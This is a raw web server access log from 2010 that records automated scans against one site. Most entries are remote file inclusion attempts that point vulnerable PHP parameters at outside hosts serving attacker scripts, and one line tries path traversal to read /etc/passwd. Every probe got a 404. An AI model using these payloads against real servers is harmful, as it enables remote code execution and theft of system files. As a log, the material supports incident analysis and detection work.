200.93.147.154 - - [28/Feb/2010:19:31:49 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:19:32:02 -0800] "GET /index.php?c=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:34:28 -0800] "GET /logs/access_090727.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:34:28 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:34:28 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:34:30 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:34:30 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:34:30 -0800] "GET /logs/access_090727.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:35:29 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:35:29 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:35:29 -0800] "GET /logs/access_090727.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:35:30 -0800] "GET /logs/access_090727.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:35:30 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:35:30 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:36:09 -0800] "GET /logs/access.log%20%20/////////?cmd&file=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:38:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:38:13 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:38:13 -0800] "GET /skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:39:02 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:39:02 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:39:03 -0800] "GET /skin/zero_vote/error.php?dir=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:19:39:45 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:19:39:45 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:40:40 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:40:40 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:40:46 -0800] "GET /logs/access.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.92.143.92 - - [28/Feb/2010:19:40:46 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.92.143.92 - - [28/Feb/2010:19:40:46 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.92.143.92 - - [28/Feb/2010:19:40:46 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.92.143.92 - - [28/Feb/2010:19:40:46 -0800] "GET /logs/access.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.92.143.92 - - [28/Feb/2010:19:40:46 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [28/Feb/2010:19:41:57 -0800] "GET /mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:41:57 -0800] "GET /logs/access_091012.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:41:58 -0800] "GET /logs//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:42:12 -0800] "GET /logs/access_090907.log//mcf.php?content=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:43:29 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.166.61.156 - - [28/Feb/2010:19:43:31 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:17 -0800] "GET /logs/access_091221.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:17 -0800] "GET /logs/access_100201.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:17 -0800] "GET /logs//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:17 -0800] "GET /export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:23 -0800] "GET /logs/access_090817.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:23 -0800] "GET /logs/access_091012.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:28 -0800] "GET /logs/access_100111.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:35 -0800] "GET /logs/access_100125.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:35 -0800] "GET /logs/access_091005.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:35 -0800] "GET /logs/access_091207.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:35 -0800] "GET /logs/access_090928.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:46:41 -0800] "GET /logs/access_100118.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:05 -0800] "GET /logs/access_100222.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:07 -0800] "GET /logs//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:07 -0800] "GET /export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:08 -0800] "GET /logs/access_091221.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:08 -0800] "GET /logs/access_100201.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:12 -0800] "GET /logs/access_091012.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:12 -0800] "GET /logs/access_090817.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:13 -0800] "GET /logs/access.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:16 -0800] "GET /logs/access_091019.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:17 -0800] "GET /logs/access_100111.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:22 -0800] "GET /logs/access_100125.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:23 -0800] "GET /logs/access_091207.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:23 -0800] "GET /logs/access_091005.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:23 -0800] "GET /logs/access_090928.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:28 -0800] "GET /logs/access_100118.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:47:49 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:47:49 -0800] "GET /logs/access_091019.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:47:49 -0800] "GET /logs/access_100208.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:47:49 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:51 -0800] "GET /logs/access_100222.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:47:57 -0800] "GET /logs/access.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:19:48:03 -0800] "GET /logs/access_091019.log%20%20//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:48:15 -0800] "GET /logs/access_091019.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:48:15 -0800] "GET /logs/access_100208.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:48:15 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:19:48:15 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:19:48:38 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dongja.booktobi.com//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.221 - - [28/Feb/2010:19:51:52 -0800] "GET /logs/access_091221.log//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.221 - - [28/Feb/2010:19:51:52 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.221 - - [28/Feb/2010:19:51:53 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://smkn-13bdg.sch.id/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:23 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:23 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:24 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:41 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:43 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:43 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:43 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:44 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.251.80.167 - - [28/Feb/2010:19:52:45 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:53:03 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.208.78.90 - - [28/Feb/2010:19:53:03 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:54:17 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:54:18 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:54:18 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [28/Feb/2010:19:54:45 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.251.80.167 - - [28/Feb/2010:19:54:45 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.251.80.167 - - [28/Feb/2010:19:54:46 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:19:55:26 -0800] "GET /main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:55:26 -0800] "GET /logs/access_100201.log%20%20//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:55:26 -0800] "GET /logs//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:55:26 -0800] "GET /logs/access_100201.log%20%20//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:55:26 -0800] "GET /main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:55:26 -0800] "GET /logs//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:19:57:13 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:19:57:14 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:19:57:14 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:19:57:31 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:19:57:31 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:19:57:31 -0800] "GET /logs/access_100111.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.114.35 - - [28/Feb/2010:19:57:54 -0800] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:58:57 -0800] "GET /logs/access_100125.log%20%20//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:19:59:07 -0800] "GET /logs/access_100125.log%20%20//main.php?appserv_root=http://paku1.fileave.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:00:00 -0800] "GET /write_update.php//bbs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
